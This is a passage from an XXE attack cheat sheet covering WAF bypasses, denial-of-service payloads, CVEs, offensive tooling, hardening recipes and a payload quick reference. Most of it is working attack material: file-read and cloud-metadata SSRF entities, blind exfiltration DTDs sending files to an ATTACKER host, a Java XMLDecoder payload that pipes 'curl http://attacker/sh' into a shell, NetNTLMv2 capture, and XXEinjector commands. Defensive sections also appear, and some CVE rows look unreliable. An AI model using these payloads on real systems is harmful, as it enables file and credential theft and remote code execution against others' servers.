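        end = xml.index("?>") + 2  # the DOCTYPE must follow the XML declaration
        xml = xml[:end] + doctype + xml[end:]
    else:
        xml = doctype + xml
    return base64.b64encode(xml.encode("utf-8")).decode("ascii")
```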

11.9 RSS / Atom

Feed-ingest services (Feedly-like, Slack preview bots, Hootsuite) routinely fetch user URLs and parse RSS. Host a poisoned feed and wait.

11.10 Android / iOS asset bundles

Android manifest, .xib, .storyboard, .plist (XML variant) — XXE reached via supply-chain build tooling has produced numerous CI takeovers.


12. WAF & Filter Bypasses

12.1 Encoding

  • UTF-7 / UTF-16: re-encode payload, declare encoding="UTF-7" in the prolog. Many WAFs only inspect UTF-8.
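  • Numeric character references inside an entity value to obscure the ENTITY/SYSTEM keywords of a nested declaration. The parser resolves them when the value is declared, before the replacement text is parsed as markup (see 12.4).
  • Comment injection: <!-- … --> comments are allowed between DTD declarations (though not inside one), while CDATA sections are not allowed in a DTD at all. Comments can pad the internal subset to break naive pattern matches.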
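The encoding point is easy to demonstrate with a benign internal entity. The sketch below uses a hypothetical byte-level filter that looks for ASCII <!DOCTYPE or <!ENTITY. The UTF-16 re-encoding contains neither byte sequence, yet Python's expat-based parser decodes it (via the BOM and the UTF-16 declaration) and still expands the entity. UTF-7 is not shown because expat does not support it natively.

```python
import xml.etree.ElementTree as ET

# A benign document whose DTD declares an internal entity.
DOC = '<?xml version="1.0" encoding="UTF-16"?><!DOCTYPE r [<!ENTITY a "expanded">]><r>&a;</r>'


def naive_filter_blocks(body: bytes) -> bool:
    """Hypothetical byte-level WAF rule: block if ASCII '<!DOCTYPE' or '<!ENTITY' appears."""
    return b"<!DOCTYPE" in body or b"<!ENTITY" in body


utf16_body = DOC.encode("utf-16")  # BOM followed by UTF-16 code units
```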

12.2 Scheme alternatives

Blocked | Alternative
file:///etc/passwd | netdoc:///etc/passwd (Java)
file:// | jar:file:///
http:// | https://, ftp://, gopher://
SYSTEM keyword filtered | PUBLIC "-//W3C//DTD..." "URI"; PUBLIC identifiers also trigger fetches

12.3 data:// smuggling

<!DOCTYPE r [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init;]><r/>

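If the parser resolves data: URIs, the base64 decodes at parse time and the result is imported as DTD text, slipping past string-based filters. Note that the sample base64 decodes only to file:///etc/passwd, which is not valid DTD markup. A working payload must encode complete declarations (for example the %file / %eval / %exfil chain from 4.2). data:// is PHP’s stream-wrapper spelling; the RFC 2397 form is data:text/plain;base64,…, and support varies by parser.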
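Two small helpers make the point concrete. Decoding the sample shows what it actually carries, and encoding real declarations produces a usable URI. In this sketch (names are hypothetical), the php_style switch only chooses between PHP's data:// spelling and the RFC 2397 data: form. Whether either is resolved at all depends on the parser.

```python
import base64


def dtd_data_uri(dtd_text: str, php_style: bool = True) -> str:
    """Base64-encode DTD markup into a data URI."""
    encoded = base64.b64encode(dtd_text.encode("utf-8")).decode("ascii")
    prefix = "data://text/plain;base64," if php_style else "data:text/plain;base64,"
    return prefix + encoded


def decode_data_uri(uri: str) -> str:
    """Inverse helper: show what a base64 data URI actually carries."""
    return base64.b64decode(uri.split(",", 1)[1]).decode("utf-8")
```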

12.4 Nested general-entity bypass via HTML entities

From Ambrotd/XXE-Notes — obfuscate the inner ENTITY so regex filters on SYSTEM and &#37; don’t match:

<!DOCTYPE foo [
  <!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;http://a/e.dtd&#x22;&#x3E;">
  %a;%dtd;
]>
<data><env>&exfil;</env></data>
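Hand-encoding the entity value is error-prone. In particular, each space must become &#x20;; otherwise the decoded text runs together into something like <!ENTITY%dtdSYSTEM"…", which is not a valid declaration. The sketch below generates the value and checks it with html.unescape. The function names are hypothetical, and the encoding is uppercase hex to match the payload's style.

```python
import html


def to_char_refs(text: str) -> str:
    """Encode every character as an uppercase hex character reference, e.g. '!' -> '&#x21;'."""
    return "".join(f"&#x{ord(ch):X};" for ch in text)


def obfuscated_pe_decl(name: str, url: str) -> str:
    """Build the %a entity value: everything except the leading '<' and the URL is encoded."""
    return "<" + to_char_refs(f'!ENTITY % {name} SYSTEM "') + url + to_char_refs('">')
```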

12.5 WrapWrap / Lightyear PHP tricks

Swarm’s “Impossible XXE in PHP” demonstrated chaining php://filter chains (convert.iconv.*) to bypass strict <?xml / <!DOCTYPE byte filters by generating the required bytes via iconv transformations inside the filter chain itself. Highly situational but lethal when the simpler bypasses fail.


13. Denial of Service

13.1 Billion Laughs

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

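This 4-level sample expands &lol4; to 10⁴ copies of “lol” (30 KB). The canonical attack continues the pattern to lol9: ~10⁹ expansions, roughly 3 GB of text in memory.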
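The growth is easy to check at small scale. Each level multiplies the expansion by ten, so &lolN; expands to 3 × 10^N characters. The sketch below uses Python's stdlib parser and is deliberately capped at four levels. Per the Python XML documentation, Expat 2.4.1 and newer is not vulnerable to the full-size attack. The function names are hypothetical.

```python
import xml.etree.ElementTree as ET


def laughs_doc(levels: int) -> str:
    """Build the section's lolz document with `levels` nested entities (capped for safety)."""
    if not 0 <= levels <= 4:
        raise ValueError("keep the demo small")
    names = ["lol"] + [f"lol{i}" for i in range(1, levels + 1)]
    decls = ['<!ENTITY lol "lol">']
    for prev, cur in zip(names, names[1:]):
        refs = f"&{prev};" * 10  # ten references to the previous level
        decls.append(f'<!ENTITY {cur} "{refs}">')
    subset = "\n  ".join(decls)
    return f"<!DOCTYPE lolz [\n  {subset}\n]>\n<lolz>&{names[-1]};</lolz>"


def expanded_length(levels: int) -> int:
    """Characters produced by &lolN;: len('lol') * 10**N."""
    return len("lol") * 10 ** levels


if __name__ == "__main__":
    print(len(ET.fromstring(laughs_doc(3)).text), expanded_length(3))  # 3000 3000
```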

13.2 Quadratic blowup

One giant entity ("A" * 100000) referenced 10,000 times (~1 GB of text). Because there is no nesting and relatively few expansions, it can stay under count- or depth-based limits such as entityExpansionLimit in some parsers.

13.3 External resource DoS

<!ENTITY x SYSTEM "http://slowloris.internal/never-closes">
<!ENTITY y SYSTEM "file:///dev/urandom">
<!ENTITY z SYSTEM "file:///dev/zero">

Each ties up a server thread: the HTTP fetch never completes, and /dev/urandom and /dev/zero never reach end-of-file. The result is cheap resource exhaustion.

13.4 YAML variant (“Billion Lols” in YAML)

YAML anchors/aliases have the same problem: any parser that expands aliases recursively without a limit is vulnerable. The XML form (XEE, XML Entity Expansion) also turns up in XML-based formats such as XAML. In one real case, Visual Studio 2022 consumed 100 GB of RAM on a crafted XAML file.


14. Real-World CVEs & Chains

CVE | Product | Notes
CVE-2014-3660 | libxml2 | Entity expansion amplification fix
CVE-2017-10271 | Oracle WebLogic | wls-wsat XMLDecoder → unauth RCE
CVE-2018-1000840 | Apache Batik | SVG xlink:href="file://" disclosure
CVE-2019-17571 | Apache log4j 1.2 SocketServer | Deserialization of untrusted data → RCE (Java serialization, not XML)
CVE-2020-5245 | dropwizard-validation | Java EL injection via self-validating constraints → RCE (not XXE)
CVE-2021-33813 | JDOM | SAXBuilder external DTD
CVE-2021-34429 | Eclipse Jetty | Encoded URIs reach WEB-INF content / bypass security constraints (not XML-related)
CVE-2022-1471 | SnakeYAML (XEE cousin) | tag-based RCE via typed deserialisation
CVE-2023-34034 | Spring Security | "**" pattern mismatch in WebFlux → access-control bypass (not SAML XXE)
CVE-2024-22257 | Spring Security | AuthenticatedVoter null-Authentication access-control flaw (not SAML XXE)
CVE-2025-27136 | LocalS3 (Java S3 emulator) | DocumentBuilderFactory default → unauth file read on CreateBucketConfiguration
CVE-2025-49493 | Akamai CloudTest | XXE in test-case import allowing file read
CVE-2025-68493 | Apache Struts | XXE in action XML configuration parsing
CVE-2026-29924 | Grav CMS ≤ 1.7.x | Admin-panel SVG upload → authenticated XXE, file read + SSRF
n/a | Cisco ISE (Identity Services Engine) | XXE in external-identity integration XML
n/a | Xerox FreeFlow Core (JMF listener on :4004) | DOCTYPE allowed → unauth SSRF + path traversal → RCE
n/a (Horizon3 “Support Ticket to 0-day” write-up) | Xerox FreeFlow Core | Full exploit chain write-up: XXE → SSRF → path traversal → RCE

14.1 Honoki — blind XXE to root file read

Creative chain: OOB XXE used to enumerate /proc/self/environ, leaked a service credential, which unlocked a privileged endpoint that returned the filesystem root. Illustrates that initial “boring” file read often unlocks higher-privilege primitives.

14.2 Bugcrowd / H1 patterns

Recurring paid reports:

  • SVG avatar → XXE file read on Rails / Node image processors.
  • DOCX import → blind OOB XXE on HR/ATS platforms.
  • SAML metadata upload → admin-role XXE on Okta-competitor SSO.
  • XLSX bulk-import → XXE reading /proc/self/environ → DB credential disclosure.

15. Tooling

15.1 XXEinjector (Ruby)

Automates direct + OOB exploitation. Highlights:

  • OOB methods: FTP (default), HTTP, gopher (Java ≤ 1.7).
  • Directory enumeration (Java) or file brute-forcing (any).
  • Second-order: sends the XXE in one request, reads it back from a second.
  • --phpfilter auto-wraps reads in php://filter/convert.base64-encode.
  • --hashes triggers SMB to steal NetNTLMv2.
  • --expect uses PHP expect wrapper for RCE.
  • --upload uses jar: to drop files in temp dir.
  • --xslt tests for XSLT injection.
ruby XXEinjector.rb --host=10.0.0.2 --path=/etc --file=req.txt --oob=http
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --phpfilter --brute=files.txt
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --hashes

15.2 XXExploiter (Node/TS — luisfontes19)

Generates payloads and serves the companion HTTP/FTP infrastructure in one go. Useful when you don’t want to stand up separate listeners.

15.3 BuffaloWill/oxml_xxe

Embeds XXE payloads into DOCX/XLSX/SVG/GPX/XMP/EPUB/IDML/PDF/HWP wrappers automatically. One-click for file-format vectors.

15.4 GoSecure dtd-finder

java -jar dtd-finder.jar target-image.tar

Scans Docker images / tarballs for DTD files and identifies overridable entities — indispensable for error-based local-DTD attacks.

15.5 defusedxml (Python)

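Defensive. Hardened drop-in replacements for xml.etree, xml.sax, minidom/pulldom, and xmlrpc (defuse_stdlib() monkey-patches the stdlib; the lxml wrapper is deprecated). By default it forbids entity declarations and external references, which also stops entity-expansion bombs; forbid_dtd=True rejects DOCTYPE entirely. Use in any Python codebase handling untrusted XML.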

15.6 Burp Suite extensions

  • Content Type Converter — flip JSON requests to XML/YAML.
  • HackVertor — tag-based encoding for rapid payload mutation.
  • XXE-Hunter — auto-detect XXE in requests with XML bodies.
  • Reissue Request Scripter — build Python scripts for iterative XXE file reads.
  • Burp Collaborator — essential OOB endpoint.

15.7 OOB infrastructure

  • Burp Collaborator (paid).
  • interact.sh / interactsh-client from ProjectDiscovery (free).
  • canarytokens.org for one-shot DNS tokens.
  • Dummy FTP for password-channel exfil: ONsec xxe-ftp-server.rb.
  • slow_http_server.py / slowserver.jar for jar: chain abuse.

16. Detection & Prevention

16.1 Static analysis patterns

Search for any XML parser instantiation not accompanied by hardening flags:

Java    DocumentBuilderFactory.newInstance()     # without setFeature hardening
        SAXParserFactory.newInstance()
        TransformerFactory.newInstance()
        SchemaFactory.newInstance()
        XMLInputFactory.newFactory()
        SAXReader                                # dom4j
        SAXBuilder                               # jdom2
        java.beans.XMLDecoder                    # RCE risk

.NET    new XmlDocument()                        # check .XmlResolver assignments
        new XmlTextReader(...)                   # check .DtdProcessing & .XmlResolver
        new XmlReaderSettings { DtdProcessing = DtdProcessing.Parse }
        XmlSerializer.Deserialize(stream)

Python  lxml.etree.XMLParser(load_dtd=True)
        lxml.etree.XMLParser(resolve_entities=True)
        xml.sax.make_parser()                    # use defusedxml instead
        xml.dom.pulldom / xml.etree              # inspect parser flags

PHP     simplexml_load_string($x, null, LIBXML_NOENT | LIBXML_DTDLOAD)
        DOMDocument::loadXML($x, LIBXML_NOENT)
        libxml_disable_entity_loader(false)      # explicit re-enable

Ruby    Nokogiri::XML(input) { |c| c.noent.dtdload }
        REXML::Document.new(input)

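Node    libxmljs.parseXml(x, { noent: true })    # libxml2 binding; noent substitutes entities
        new xmldom.DOMParser()                   # review DOCTYPE/entity handling of the installed version
        xml2js.parseString(...)                  # review DOCTYPE/entity handling of the installed version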
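The patterns above lend themselves to a line-oriented grep. A minimal sketch; the labels and regexes are hypothetical and cover only a subset of the list. Every hit is a review candidate rather than a finding, because hardening calls (setFeature, XmlResolver = null, and so on) may follow on later lines.

```python
import re

# (label, pattern) pairs mirroring part of the list above.
RISKY = [
    ("java-dom", r"DocumentBuilderFactory\.newInstance\("),
    ("java-sax", r"SAXParserFactory\.newInstance\("),
    ("java-transformer", r"TransformerFactory\.newInstance\("),
    ("java-schema", r"SchemaFactory\.newInstance\("),
    ("java-stax", r"XMLInputFactory\.new(?:Factory|Instance)\("),
    ("java-xmldecoder", r"\bXMLDecoder\b"),
    ("dotnet-xmldocument", r"new\s+XmlDocument\s*\("),
    ("dotnet-xmltextreader", r"new\s+XmlTextReader\s*\("),
    ("dotnet-dtd-parse", r"DtdProcessing\s*=\s*DtdProcessing\.Parse"),
    ("python-lxml-flags", r"XMLParser\([^)]*\b(?:load_dtd|resolve_entities)\s*=\s*True"),
    ("python-sax", r"xml\.sax\.make_parser\("),
    ("php-libxml-flags", r"LIBXML_(?:NOENT|DTDLOAD)\b"),
    ("php-loader-reenabled", r"libxml_disable_entity_loader\(\s*false"),
    ("ruby-nokogiri-noent", r"\.noent\b"),
]
COMPILED = [(label, re.compile(pattern)) for label, pattern in RISKY]


def scan_source(text: str) -> list[tuple[int, str]]:
    """Return (line number, label) for every risky pattern found in `text`."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, rx in COMPILED:
            if rx.search(line):
                hits.append((lineno, label))
    return hits
```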

16.2 Secure-by-default recipes

Java:

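import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Primary control: reject any DOCTYPE outright.
// setFeature throws ParserConfigurationException if the implementation lacks a feature.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defence in depth, and the fallback when DOCTYPEs must be accepted:
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);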

.NET ≥ 4.5.2:

using System.Xml;

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,   // throws XmlException on any DOCTYPE
    XmlResolver   = null                      // never fetch external resources
};
using var reader = XmlReader.Create(stream, settings);

Python:

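from defusedxml import ElementTree as ET   # rejects entity declarations and external references by default
root = ET.fromstring(xml_bytes, forbid_dtd=True)   # forbid_dtd=True also rejects any DOCTYPE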

or native lxml:

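import lxml.etree

parser = lxml.etree.XMLParser(
    resolve_entities=False,   # do not substitute entities
    no_network=True,          # refuse network fetches (already the default)
    load_dtd=False,
    dtd_validation=False,
    huge_tree=False,          # keep libxml2's size/depth limits
)
root = lxml.etree.fromstring(xml_bytes, parser)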
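Where neither defusedxml nor lxml is available, the stdlib SAX parser can be pinned down explicitly. General external entities have been off by default since Python 3.7.1; setting both features anyway documents the intent and covers older runtimes. A minimal sketch; `TextCollector` and `parse_text_safely` are hypothetical names.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Accumulates character data so callers can inspect what was parsed."""

    def __init__(self):
        super().__init__()
        self.parts: list[str] = []

    def characters(self, content):
        self.parts.append(content)


def parse_text_safely(data: bytes) -> str:
    parser = xml.sax.make_parser()
    # Never load external general or parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return "".join(handler.parts)
```

This blocks file read and SSRF but not internal-entity expansion; pair it with defusedxml or the expat hook approach when entity bombs are in scope.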

PHP (modern):

$doc = new DOMDocument();
$doc->loadXML($xml);     // PHP 8+ with libxml2 >= 2.9: external entities are not loaded unless LIBXML_NOENT / LIBXML_DTDLOAD are passed

Avoid LIBXML_NOENT and LIBXML_DTDLOAD unless absolutely required.

Ruby / Nokogiri:

Nokogiri::XML(input)     # safe defaults; do not add .noent or .dtdload

16.3 Network & runtime defences

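  • Egress-filter the app server: block 169.254.169.254 and arbitrary outbound HTTP/FTP from parser contexts. Egress rules cannot stop local file:// reads; only parser hardening does.
  • IMDSv2 (AWS): enforce HttpTokens=required. An XXE fetch can only issue a plain GET and cannot obtain the session token, which requires a PUT with a custom header.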
  • Container egress: default-deny, allowlist specific hostnames only.
  • WAF rules that block <!DOCTYPE / <!ENTITY on non-XML endpoints and strip them on XML endpoints that don’t need DTD.
  • Suppress detailed parser errors in production responses (kills error-based variants).
  • Sandbox file-format processors (ImageMagick policy.xml, LibreOffice profile, SVG rasterisers) in containers without filesystem/network access.
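When an application genuinely needs a custom entity resolver that fetches over the network, an allowlist check before each fetch complements the network controls above. A minimal sketch with hypothetical names (`is_internal`, `fetch_allowed`); the allowlist contents are yours to define. It resolves the host and re-checks every address so an allowlisted name pointing at 169.254.169.254 is still refused. The later fetch re-resolves, so pin the checked IP to avoid DNS rebinding.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_internal(ip: str) -> bool:
    """True for loopback, link-local (incl. 169.254.169.254), private and other non-public ranges."""
    addr = ipaddress.ip_address(ip.split("%", 1)[0])  # drop an IPv6 zone id if present
    return (addr.is_loopback or addr.is_link_local or addr.is_private
            or addr.is_reserved or addr.is_unspecified or addr.is_multicast)


def fetch_allowed(url: str, allowed_hosts: set[str]) -> bool:
    """Allowlist check a custom entity resolver could run before any fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in allowed_hosts:
        return False  # file://, ftp://, jar:, unknown hosts...
    port = parts.port or (443 if parts.scheme == "https" else 80)
    infos = socket.getaddrinfo(parts.hostname, port, proto=socket.IPPROTO_TCP)
    return not any(is_internal(info[4][0]) for info in infos)
```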

16.4 Logging / detection signals

  • XML parser error logs mentioning external entity, SYSTEM, DOCTYPE.
  • Outbound DNS/HTTP from application servers to unknown domains.
  • Requests that include <!DOCTYPE on endpoints that historically received pure-data XML.
  • Access to /proc/self/environ, /etc/passwd, /root/.ssh/ by parser processes.
  • Sudden spikes in heap / CPU — possible billion-laughs.
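The request-side signals above can be turned into a simple body classifier for logging. A minimal sketch; the labels, the regexes and `xxe_signals` are hypothetical. It also scans a decoded copy of BOM-prefixed UTF-16 bodies, where `<!DOCTYPE` hides between NUL bytes, and flags UTF-7/16/32 declarations as a sign of encoding-based evasion.

```python
import re

SIGNALS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.IGNORECASE),
    "entity-decl": re.compile(rb"<!ENTITY", re.IGNORECASE),
    "external-id": re.compile(rb"\b(?:SYSTEM|PUBLIC)\s+[\"']", re.IGNORECASE),
    "xinclude": re.compile(rb"XInclude", re.IGNORECASE),
    "sensitive-path": re.compile(rb"/etc/passwd|/proc/self/|169\.254\.169\.254|/\.ssh/", re.IGNORECASE),
    "odd-encoding": re.compile(rb"encoding\s*=\s*[\"']utf-(?:7|16|32)", re.IGNORECASE),
}


def xxe_signals(body: bytes) -> list[str]:
    """Return the sorted signal labels found in a request body."""
    views = [body]
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        # Scan a UTF-8 copy of a BOM-prefixed UTF-16 body as well.
        views.append(body.decode("utf-16", errors="replace").encode("utf-8"))
    return sorted({label for label, rx in SIGNALS.items() for view in views if rx.search(view)})
```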

16.5 Test checklist

  1. Send <!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r> — does test appear? Entities enabled.
  2. Send OOB probe with Collaborator — do callbacks land? External resolution enabled.
  3. Send parameter-entity probe — does the remote DTD get fetched? PE expansion enabled.
  4. Send classic file read — is content reflected?
  5. Send FTP/HTTP exfil via remote DTD — captures data?
  6. Send error payload with bad path — does response include filename fragment?
  7. Send a jar: probe (Java). Does a temporary file appear?
  8. Send a billion-laughs payload with only a few nesting levels. Does the service degrade? Back off if yes.
  9. File-format wrappers — SVG avatar, DOCX upload, SAML metadata, RSS feed import.
  10. JSON→XML swap on every JSON endpoint that returns data.
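Steps 1 to 3 are easier to read when every probe carries its own marker. A minimal sketch with a hypothetical `build_probes` helper; `host` stands for your Collaborator/interactsh domain. In step 1 the marker is split across two entities, so it only appears after expansion and an endpoint that merely echoes the raw body cannot produce a false positive.

```python
import uuid


def _token(n: int = 12) -> str:
    return uuid.uuid4().hex[:n]


def build_probes(host: str) -> dict[str, tuple[str, str]]:
    """Return {checklist step: (marker to look for, payload)}."""
    head, tail = _token(6), _token(6)
    t2, t3 = _token(), _token()
    return {
        # Step 1: success = head+tail reflected in the response.
        "1-internal-entity": (head + tail,
            f'<!DOCTYPE r [<!ENTITY x "{head}"><!ENTITY y "{tail}">]><r>&x;&y;</r>'),
        # Step 2: general external entity; success = GET /<t2> on the OOB host.
        "2-external-general": (t2,
            f'<!DOCTYPE r [<!ENTITY x SYSTEM "http://{host}/{t2}">]><r>&x;</r>'),
        # Step 3: parameter entity; success = GET /<t3>, even with no reflection.
        "3-parameter-entity": (t3,
            f'<!DOCTYPE r [<!ENTITY % p SYSTEM "http://{host}/{t3}"> %p;]><r/>'),
    }
```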

17. Payload Quick Reference

17.1 Detection probes

<!-- Local entity round-trip -->
<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>

<!-- OOB via general entity -->
<!DOCTYPE r [<!ENTITY p SYSTEM "http://COLLAB/g">]><r>&p;</r>

<!-- OOB via parameter entity (catches stricter parsers) -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://COLLAB/p"> %p;]><r/>

17.2 File read

<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///proc/self/environ">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "netdoc:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "jar:file:///tmp/a.jar!/b.txt">]><r>&x;</r>

17.3 SSRF

<!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://127.0.0.1:6379/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://[::1]/">]><r>&x;</r>

17.4 Blind OOB external DTD

Victim:

<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://ATTACKER/evil.dtd"> %dtd;]><r/>

evil.dtd (HTTP channel):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER/?x=%file;'>">
%wrap;
%exfil;

evil.dtd (FTP channel for multiline files):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'ftp://a:%file;@ATTACKER/'>">
%wrap;
%exfil;
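Both evil.dtd variants share one shape and differ only in the sink URL, so they can be rendered from a single template. A minimal sketch; `build_evil_dtd` is hypothetical and `ATTACKER` is the same placeholder used above. `source_uri` is any URI the victim parser can read (file://, php://filter, ...).

```python
def build_evil_dtd(source_uri: str, attacker: str, channel: str = "http") -> str:
    """Render the two-stage exfil DTD for the chosen channel."""
    if channel == "http":
        sink = f"http://{attacker}/?x=%file;"        # single-line files
    elif channel == "ftp":
        sink = f"ftp://a:%file;@{attacker}/"         # multiline files, per the FTP variant
    else:
        raise ValueError(f"unsupported channel: {channel!r}")
    return (
        f'<!ENTITY % file SYSTEM "{source_uri}">\n'
        # &#x25; defers the inner % so %file; is substituted when %wrap; expands.
        f'<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM \'{sink}\'>">\n'
        "%wrap;\n"
        "%exfil;\n"
    )
```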

17.5 Error-based (external DTD)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;

17.6 Error-based (local DTD — GNOME yelp)

<!DOCTYPE r [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; err SYSTEM &#x27;file:///nope/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;err;
  '>
  %local_dtd;
]>
<r/>

17.7 lxml meow:// bypass

<!DOCTYPE r [
  <!ENTITY % a '
    <!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
  '>
  %a; %b;
]>
<r>&c;</r>

17.8 XInclude

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

17.9 SVG upload

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
  <text y="20">&x;</text>
</svg>

17.10 SOAP

<!-- Only effective if the service re-parses the CDATA string with a second XML parser -->
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <payload><![CDATA[<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>]]></payload>
  </soap:Body>
</soap:Envelope>

17.11 PHP RCE via expect (requires the PECL expect extension)

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]><r>&x;</r>

17.12 Java XMLDecoder RCE

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/sh</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>curl http://attacker/sh|sh</string></void>
    </array>
    <void method="start"/>
  </object>
</java>

17.13 Windows NetNTLMv2 capture

<!DOCTYPE r [<!ENTITY x SYSTEM "file:////ATTACKER-IP/share/a.jpg">]><r>&x;</r>

17.14 Billion laughs

<!DOCTYPE lolz [
  <!ENTITY a0 "lol">
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<lolz>&a4;</lolz>
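The growth is easy to quantify: with fan-out 10 and a 3-character seed, the fully expanded size of level n is 3 × 10^n characters. The four levels above therefore yield 30,000 characters (a safe probe), while the classic nine-level payload yields 3 × 10^9 characters, roughly 3 GB. A small sketch that computes this from the entity table without materialising the string; `lol_entities` and `expanded_size` are hypothetical helpers.

```python
import re

REF = re.compile(r"&(\w+);")


def lol_entities(depth: int, fanout: int = 10, seed: str = "lol") -> dict[str, str]:
    """Entity table shaped like 17.14: a0 = seed, a<n> = fanout copies of &a<n-1>;"""
    table = {"a0": seed}
    for n in range(1, depth + 1):
        table[f"a{n}"] = f"&a{n - 1};" * fanout
    return table


def expanded_size(table: dict[str, str], name: str) -> int:
    """Characters produced by fully expanding &name;, memoised per entity."""
    memo: dict[str, int] = {}

    def size(entity: str) -> int:
        if entity not in memo:
            value = table[entity]
            literal_chars = len(REF.sub("", value))
            memo[entity] = literal_chars + sum(size(ref) for ref in REF.findall(value))
        return memo[entity]

    return size(name)
```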

17.15 UTF-7 encoded DOCTYPE

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
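Payloads like this can be generated rather than hand-written. A minimal sketch, assuming the target parser honours the UTF-7 declaration (libxml2 support depends on its iconv build). It keeps RFC 2152 "Set D" characters and whitespace literal and shifts every other run into modified base64 of UTF-16BE. Unlike the hand-written payload above, it always closes a shifted run with an explicit `-`. `utf7_obfuscate` and `utf7_document` are hypothetical names.

```python
import base64
import re

# Everything outside Set D (A-Z a-z 0-9 ' ( ) , - . / : ?) and whitespace is shifted.
NEEDS_SHIFT = re.compile(r"[^A-Za-z0-9'(),\-./:? \t\r\n]+")


def _shift(run: str) -> str:
    """Encode a run as +<base64 of UTF-16BE without padding>-."""
    b64 = base64.b64encode(run.encode("utf-16-be")).decode("ascii").rstrip("=")
    return f"+{b64}-"


def utf7_obfuscate(text: str) -> str:
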